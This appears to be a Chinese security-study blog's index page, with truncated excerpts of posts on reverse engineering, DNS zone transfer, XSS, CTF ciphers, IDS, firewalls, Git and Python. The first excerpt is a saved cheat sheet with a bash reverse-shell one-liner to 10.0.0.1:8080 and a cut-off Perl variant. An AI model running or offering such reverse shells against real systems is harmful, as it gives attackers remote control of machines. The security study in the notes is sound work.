安全汪

以前看到过，但是今天找了很久才找到。所以做一下截图，以备下次忘记能快速找到

bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ，注意这个是由解析shell的bash完成，所以某些情况下不支持 perl版本: perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(co

session : Session直接翻译成中文比较困难，一般都译成时域。在计算机专业术语中，Session是指一个终端用户与交互系统进行通信的时间间隔，通常指从注册进入系统到注销退出系统之间所经过的时间。以及如果需要的话，可能还有一定的操作空间。具体到Web中的Session指的就是用户在浏览某个网站时，从进入。    cookie : Cookie，有时也用其复数形式Cookies，指

文章转自Freebuf，作者VillanCh,很精彩，担心下次再找，暂时保留下来以备学习查阅。如果你也喜欢，请联系作者转载！============================================逆向工程（一）：汇编、逆向工程基础篇VillanCh2015-11-24共19147人围观，发现9个不明物体周边系统安全本文原创作者：V

最近学校的一个网站被挂了黑链，被叫去做技术支持= =! 简单介绍一下具体情况：访问网站根目录下的一个文件:http://www.demo.com/yule 显示的是黑链地址，但是我登录到服务器上定位到根目录的时候却找不到这个文件。开始以为是文件设置了隐藏，不过修改之后还是不可以。然后怀疑黑客在服务器上做了虚拟目录，然后全盘搜索文件“yule”，奇怪的是全部盘符下都没找到这个文件。真是日了狗

当浏览者访问一个网页时，浏览者的浏览器会向网页所在服务器发出请求。当浏览器接收并显示网页前，此网页所在的服务器会返回一个包含HTTP状态码的信息头（server header）用以响应浏览器的请求。HTTP状态码的英文为HTTP Status Code。下面是常见的HTTP状态码：200 - 请求成功301 - 资源（网页等）被永久转移到其它URL404

8月书单：《Python Web开发》《白帽子讲Web安全》 9月书单：《人月神话》《简约之美-软件设计之道》

最近要做企业级的基线检测，虽然已经有了比较成熟的基线检测工具，但是搜索的时候看到Lynis这款工具，以前接触过，不过没有自己研究，刚好趁这个机会，学习一下这款工具的使用。 介绍 Lynis是一款开源的安全审计工具。功能主要是对Unix / Linux系统进行基线检测。 除了程序原有的配置外，同时也可以根据需要对配置文件的定制安装 下载地址:https://github.c

抗战纪念日放了3天假，本来想回家呢，有个同学带着女朋友来学校玩，就只能在学校等他们了，刚好趁着这段时间，仔细学习了一下域传送漏洞，网上很多资料，这里整理只是为了做一个记录，加深印象，防止自己忘记…0x01：什么事域传送漏洞：DNS区域传送（DNS zone transfer）指的是一台备用服务器使用来自主服务器的数据刷新自己的域（zone）数据库。这为运行中的DNS服务提供了一定的冗余度，其目的是

最近在整理一些CTF题目，遇到很多很有意思的东西，记录下来0x01：栅栏加密栅栏加密法是一种比较简单快捷的加密方法。栅栏加密法就是把要被加密的文件按照一上一下的写法写出来，再把第二行的文字排列到第一行的后面。相应的，破译方法就是把文字从中间分开，分成2行，然后插入。栅栏加密法一般配合其他方法进行加密。例：加密information分行i f r a i nn o m t o合并if

从Python 2.4开始，Python引入subprocess模块来管理子进程，以取代一些旧模块的方法：如 os.system、os.spawn*、os.popen*、popen2.*、commands.*不但可以调用外部的命令作为子进程，而且可以连接到子进程的input/output/error管道，获取相关的返回信息一、subprocess以及常用的封装函数运行python的

昨天上午看到圈子里有人在讨论hacking team被黑引起的那个flash漏洞，准备晚上研究一下呢。下午在教室上自习备考期末，无奈对课本上的知识一点都不敏感，就刷刷微博，看到圈子里爆炸似的转载Hacking Team 400G数据流出的消息。更有手快者已经进行了分析。这400G数据像一颗重磅炸弹一样引爆了国内的安全圈子。我也在第一时间赶回宿舍，操起我的pc小水管开始下载，不过当然不是那400G了，

最近整理点防火墙和入侵检测系统的东西，记录在这里。入侵检测系统：（intrusion detection system，简称“IDS”）是一种对网络传输进行即时监视，在发现可疑传输时发出警报或者采取主动反应措施的网络安全设备。它与其他网络安全设备的不同之处便在于，IDS是一种积极主动的安全防护技术。下面是一张入侵检测系统的基本模型简单的介绍一下图中模块的功能：探测器：又称数据收集器，负责收集入侵

最近整理点防火墙和入侵检测系统的东西，记录在这里。防火墙：是一种高级访问控制设备，置于不同的网络安全域之间的一些列部件的组合，它是不同网络安全域间通信流的唯一通道，能根据企业有关的安全策略控制（允许、拒绝、监视、记录）进出网络的访问行为。防火墙主要面临的安全威胁：通过更改防火墙配置参数和其它相关安全数据而展开的攻击攻击者利用高层协议和服务对内部受保护网络或主机进行的攻击绕开身份认证和鉴别机制

今天继续研究了一下PKAV“心伤的瘦子”的XSS系列教程，收获挺大的，这里主要记录下来，以备忘记！ 下面是这个系列教程的截图，可以在这里看到，当让，每一个知识知识点，都可以在这里（传送门）得到复现。作为程序员，会让你意思到自己以前的编码方式中有诸多的不足，作为安全研究者，深深地感觉到，原来还可以这么玩….昨天的知识点忘记整理了，先吧今天的写上，以后再补： **DOM_XSS之iframe标签的变

今晚又看了一遍PKAV-心上的瘦子写的xss腾讯系列的例子，收获挺大的，其中对宽字节注入有了更深的了解，又查找了一些相关的资料，整理一下，以备以后查阅 参考文档： http://book.2cto.com/201301/14515.html http://itindex.net/detail/47408-xss-%E5%AD%A6%E4%B9%A0-xss http://ww

没写过什么大的项目，也根本没接触过版本控制。这学期接触到软件工程这门课之后才知道有这么个东西。以前用过SVN。今天用了一下午+晚上的时间学习了一下Git的基本应用，参考的是廖雪峰老师的教程： 廖雪峰Git http://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000实验的环境是：VM虚

参考资料： http://docs.python.org/library/struct.html#module-struct http://blog.sina.com.cn/s/blog_75e9551f01016dhp.html http://python.jobbole.com/81554/相对于其他的编程语言，Python中的数据类型只有六种：字符串

一、套接字套接字是为特定网络协议（例如TCP/IP，ICMP/IP，UDP/IP等）套件对上的网络应用程序提供者提供当前可移植标准的对象。它们允许程序接受并进行连接，如发送和接受数据。为了建立通信通道，网络通信的每个端点拥有一个套接字对象极为重要。套接字为BSD UNIX系统核心的一部分，而且他们也被许多其他类似UNIX的操作系统包括Linux所采纳。许多非BSD UNIX系统（如ms-dos，wi